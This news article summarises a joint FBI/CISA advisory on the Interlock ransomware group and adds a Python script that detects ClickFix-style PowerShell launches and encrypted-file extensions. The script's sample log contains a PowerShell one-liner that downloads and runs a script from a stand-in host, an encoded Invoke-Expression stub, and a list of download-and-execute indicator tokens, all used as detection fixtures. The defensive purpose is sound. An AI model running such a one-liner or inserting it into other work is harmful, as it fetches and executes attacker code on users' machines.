
FBI Advises Caution Against Dangerous Interlock Ransomware Cyberattacks

Financially motivated ransomware gang has quickly built a notorious track record


In a coordinated effort to protect businesses and critical infrastructure, the FBI, CISA, HHS, and MS-ISAC have jointly published a security advisory detailing the tactics, methodology, and recommended defensive measures against the Interlock ransomware group.

The Interlock operators use double extortion: they exfiltrate sensitive data before encrypting systems, so victims are pressured to pay both to restore their data and to prevent a leak. Unusually for ransomware, Interlock gains initial access through drive-by downloads from compromised but otherwise legitimate websites, and through the ClickFix social engineering technique, in which a fake prompt (for example a bogus CAPTCHA or "fix" dialog) instructs the victim to paste and run a command that actually launches the malicious payload.

Interlock's encryptors target both Windows and Linux, with the Linux variant aimed at virtual machines (VMs), including VMware ESXi environments. After initial compromise, the actors use a range of methods for network discovery, credential theft, and lateral movement to expand their control.

Victims receive a unique code and instructions to contact Interlock through a Tor .onion site; the ransom note itself does not state a demand amount. The advisory also details mitigations organizations can apply to protect against Interlock attacks.

To defend against Interlock, the FBI recommends that organizations patch their systems and software, use DNS filtering and web firewalls to block access to malicious sites, enforce multi-factor authentication (MFA) and strong access controls, segment their networks, and deploy robust Endpoint Detection and Response (EDR) tooling, including on virtual machines.

Interlock typically targets businesses and critical infrastructure organizations in North America and Europe. The group is financially motivated and uses a variety of tools at different stages of an intrusion, including PowerShell-based remote access trojans (RATs), keyloggers, registry modifications for persistence, and AnyDesk, PuTTY, ScreenConnect, Cobalt Strike, SystemBC, and others for remote access and command-and-control.

There are overlaps between Interlock and another ransomware group, Rhysida, suggesting possible cooperation or shared infrastructure. The Interlock ransom note contains a Tor link for negotiations, and victims are usually given 96 hours to respond. The encryptors exist for both Windows and Linux, and encrypted files receive either a .interlock or a .1nt3rlock extension.
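Two of the behaviours described above are easy to hunt for in endpoint telemetry: the ClickFix pattern (a user pastes a "fix" into the Run dialog, which shows up as explorer.exe spawning PowerShell with a download-and-execute or encoded command line) and the .interlock / .1nt3rlock extension appearing on files during encryption. The following is an added example written for this article, not code from the advisory or from any vendor; the log format, field names, sample records and indicator tokens are all assumptions made for the example, and the sample records are constructed, not real telemetry.

```python
"""Added example: a small detection pass over constructed process-creation and
file-write records, flagging ClickFix-style PowerShell launches from explorer.exe
and files renamed with Interlock's .interlock / .1nt3rlock extensions.
Everything below (format, field names, tokens, samples) is an assumption for
illustration and is not from the advisory."""
import base64
import re
from dataclasses import dataclass

# Constructed sample records (NOT real telemetry). Assumed format:
# kind|host|parent_image|image|command_line_or_path
SAMPLE_LOG = r"""
proc|WS01|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/fix.ps1')"
proc|WS01|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\alice\notes.txt
proc|WS02|C:\Program Files\Microsoft VS Code\Code.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -File build.ps1
proc|WS03|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -enc SQBFAFgA
file|WS01|-|-|C:\Users\alice\Documents\budget.xlsx.interlock
file|WS01|-|-|C:\Users\alice\Documents\report.docx.1nt3rlock
file|WS02|-|-|C:\Users\bob\Desktop\photo.jpg
"""
# "SQBFAFgA" above is the base64 of "IEX" in UTF-16LE, i.e. an encoded
# Invoke-Expression stub (constructed for the example).

CLICKFIX_PARENTS = {"explorer.exe"}          # Run dialog / shell launches
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
ENCRYPTED_EXTENSIONS = (".interlock", ".1nt3rlock")
# Assumed indicator tokens for a download-and-execute one-liner.
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                     "invoke-webrequest", "-w hidden", "-windowstyle hidden",
                     "-ep bypass", "http://", "https://")


@dataclass
class Alert:
    host: str
    rule: str
    detail: str


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -enc/-EncodedCommand payload, or "" if there is none."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_process(host: str, parent: str, image: str, cmdline: str):
    """ClickFix heuristic: explorer.exe -> PowerShell with download/execute traits."""
    if basename(parent) not in CLICKFIX_PARENTS or basename(image) not in POWERSHELL_IMAGES:
        return None
    # Inspect the visible command line and the decoded -enc payload together.
    text = (cmdline + " " + decode_encoded_command(cmdline)).lower()
    hits = [t for t in SUSPICIOUS_TOKENS if t in text]
    if not hits:
        return None
    return Alert(host, "clickfix_powershell",
                 f"{basename(parent)} -> {basename(image)}: {', '.join(hits)}")


def check_file(host: str, path: str):
    """Interlock encryptor output: file renamed with .interlock / .1nt3rlock."""
    if path.lower().endswith(ENCRYPTED_EXTENSIONS):
        return Alert(host, "interlock_extension", path)
    return None


def scan(log_text: str) -> list:
    """Run both checks over every record and return the alerts in log order."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        kind, host, parent, image, payload = line.split("|", 4)
        alert = (check_process(host, parent, image, payload) if kind == "proc"
                 else check_file(host, payload))
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a.host}: {a.rule}: {a.detail}")
```

On the sample data this yields four alerts: the two explorer.exe-to-PowerShell launches (one with a plain download-and-execute one-liner, one whose encoded payload decodes to an Invoke-Expression stub) and the two renamed files; the developer's PowerShell build launched from an editor and the untouched photo are not flagged. In production the parent-process and token lists would be tuned to the environment, and the file rule is a late indicator (encryption is already under way), so it belongs in an automated isolation playbook rather than in a daily report.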

Interlock threatens to publish stolen data on its dark web leak site if the ransom is not paid. As the group becomes increasingly active, organizations should implement the defensive measures outlined in the advisory to reduce both the likelihood of initial infection and the damage a successful intrusion can cause.


Because Interlock relies on both unpatched software and tricked users for initial access, organizations should combine the advisory's technical controls, chiefly patching, EDR coverage (including on virtual machines), and MFA, with vigilance against the drive-by and ClickFix lures the group uses. Given its focus on North America and Europe, businesses in those regions in particular should treat the advisory as a priority.
